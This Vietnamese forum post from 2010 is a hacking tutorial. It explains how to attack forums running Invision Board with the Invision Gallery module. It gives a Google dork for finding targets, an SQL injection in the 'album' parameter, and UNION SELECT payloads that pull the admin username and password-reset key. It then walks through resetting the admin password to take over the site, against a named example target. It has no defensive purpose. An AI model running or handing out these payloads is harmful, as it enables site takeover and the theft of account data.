»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-»

.:hix lâu không làm web.nên giờ lười làm quá.dùng tạm cái Forum việt vậy.chủ yếu là chất lượng Những bài viết thôi đúng không.thật THà là nói hết không giấu diếm nhưng học xong cấm nghịch bậy..http://guichonguoiay.net.tf web mình đó RỖI VÀO CHơi Ha.hjhj:.
 
Trang ChínhPortalCalendarGalleryTrợ giúpTìm kiếmThành viênNhómĐăng kýĐăng Nhập
Thông Tin Cực Sock Cho Những Ai Nghiện Game Audition Của Thái Nguyên.Sau Một Thời Gian Tìm Hiểu Mà Nhờ Mấy Anh Ở forum ClbGame Mình Đã Cài THành Công Bản Audition Offline THái Nguyên.Sắp Tới Mình Sẽ Đưa Lên Online.Các Bạn Muốn Chơi Game Và Muốn Sở Hữu Những Bộ Đồ Đẹp Nhất Không Còn Chần Chừ Gì Nữa Mà Không Click Chuột Để Truy Cập Trang Web wWw.AuTn.tk Để Download Và Thưởng thức

Share | 
 

 Tổng Hợp hack IBF (bài 3)

Go down 
Tác giảThông điệp
Admin
Admin


Tổng số bài gửi : 136
Join date : 13/03/2010

Bài gửiTiêu đề: Tổng Hợp hack IBF (bài 3)   Tue Mar 16, 2010 9:24 pm

Tổng Hợp hack IBF (bài 3)





Lại IBF Very Happy Lỗi Gallery



Test típ nào
Cía này chỉ chơi forum có hỗ trợ Invision Gallery thui nha
Hé bài này chôm của Meox VHS có gì thông cảm heng
chào lên mod rùi tui có 1 bài tặng các bạn
để tìm mục tiêu. bạn vào google và search với key:
allinurl:"index.php?automodule=gallery"
nó sẽ hiện ra 1 đống site, bạn nên kô chọn mấy cái ở trang ở đầu vì mấy trang đó Fix hết rùi
Sad
ở đây tui chọn site này: hxxp://www.nhocikaka.com/forums/index.phpok! test bug. thêm ?automodule=gallery&cmd=rate&img=1&rating=1&album= 1' vào sao index.php
====> ta có link: hxxp://www.nhocikaka.com/forums/index.php?automodule=gallery&cmd=rate&img=1&rating =1&album=1'
nó hiện ra kết quả:

Code:

mySQL query error: SELECT * FROM ibf_gallery_albums WHERE id=1'



SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

SQL error code:

Date: Friday 13th 2006f October 2006 06:39:58 AM

===> dính bug!, bạn lưu ý phần màu vàng nha là prefic của table nên ghi lại!
tiếp theo, ta vào link sau để đăng ký một nick: hxxp://www.nhocikaka.com/forums/index.php?act=REG đăng ký xong thì login vào(ko cần validate)!
login xong thì ta nhập link sau vào sau index.php:
automodule=gallery&cmd=rate&img=1&rating=1&album=-1 union select 1,name,1,1,1,1,1,1,1,1 from ibf_members where id=1

chú ý ibf là phần prefix hồi nãy, id là id của admin, có thể là 1,2,3,4,5....hoặc gì đó.để có id chính xác bạn có thể vào index.php?act=members, chọn là Admin hoặc root admin rồi search, thấy Ông nào có level cao nhất là nó, rê chuột vô, trên thanh status sẽ hiện lên showuser={id của nó}===>chính xác!

ok! nhập link vô rùi bấm enter: hxxp://www.nhocikaka.com/forums/index.php?automodule=gallery&cmd=rate&img=1&rating =1&album=-1 union select 1,name,1,1,1,1,1,1,1,1 from ibf_members where id=1

chờ chút:trên thanh address cái địa chỉ nó trả về như sau:http://www.xxx.com/forums/index.php?automodule=gallery&cmd=user&user=nhocikaka&op=view_album&album=-1%20union%20select%201,name,1,1,1,1,1,1,1,1%20from %20ibf_members%20where%20id=1
kha kha, vậy user của Ông admin là Nhocikaka. đíi reset pass nó coi!
hxxp://www.nhocikaka.com/forums/index.php?act=REG&CODE=10
nhập user vô, nhập mấy cái số bảo mật trên tấm hình vô. bấm cái rẹt! Xong, nó báo đã gửi, chờ 10 phút!( có thể nhanh hơn )
tiếp theo, ta nhập link sau:
automodule=gallery&cmd=rate&img=1&rating=1&album=-1 union select 1,vid,1,1,1,1,1,1,1,1 from ibf_validating where member_id=1

chú ý mấy cái ibf và member_id nhé. ibf là prefix, còn member_id là id của Ông admi lấy hồi nãy!
nó trả về trên thanh address như sau:
hxxp://www.xxx.com/forums/index.php?automodule=gallery&cmd=user&user=df5dffadc2136f6b09a54fa59cda6888&op=view_album&album=-1%20union%20select%201,vid,1,1,1,1,1,1,1,1%20from% 20ibf_validating%20where%20member_id=2
ta copy cái dòng sau:df5dffadc2136f6b09a54fa59cda6888
dán vô đâu đó

sau đó vào :hxxp://www.nhocikaka.com/forums/index.php?act=REG&CODE=06
nhập id Ông admin vô! nhập cái dòng hồi nãy là df5dffadc2136f6b09a54fa59cda6888
hai ô dưới nhập password mới cho nó, nhập tiếp mấy cái bảo mật bằng hình wái gì đó, click vô cái nút dễ thương or bấm enter. chờ chút, logout ra, đăng nhập với cái user admin , ở đây là andrew, password là cái pass nãy mình nhập va 2ta sẽ là admin!



Nhocikaka(HCE)
Về Đầu Trang Go down
Xem lý lịch thành viên http://itcu.forumvi.com
 
Tổng Hợp hack IBF (bài 3)
Về Đầu Trang 
Trang 1 trong tổng số 1 trang

Permissions in this forum:Bạn không có quyền trả lời bài viết
»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-» :: Phận Làm Trai Gõ Phím Bình Thiên Hạ--Chí Anh Hùng Click Chuột Định Giang Sơn :: Những điều cơ bản để hack một trang web-
Chuyển đến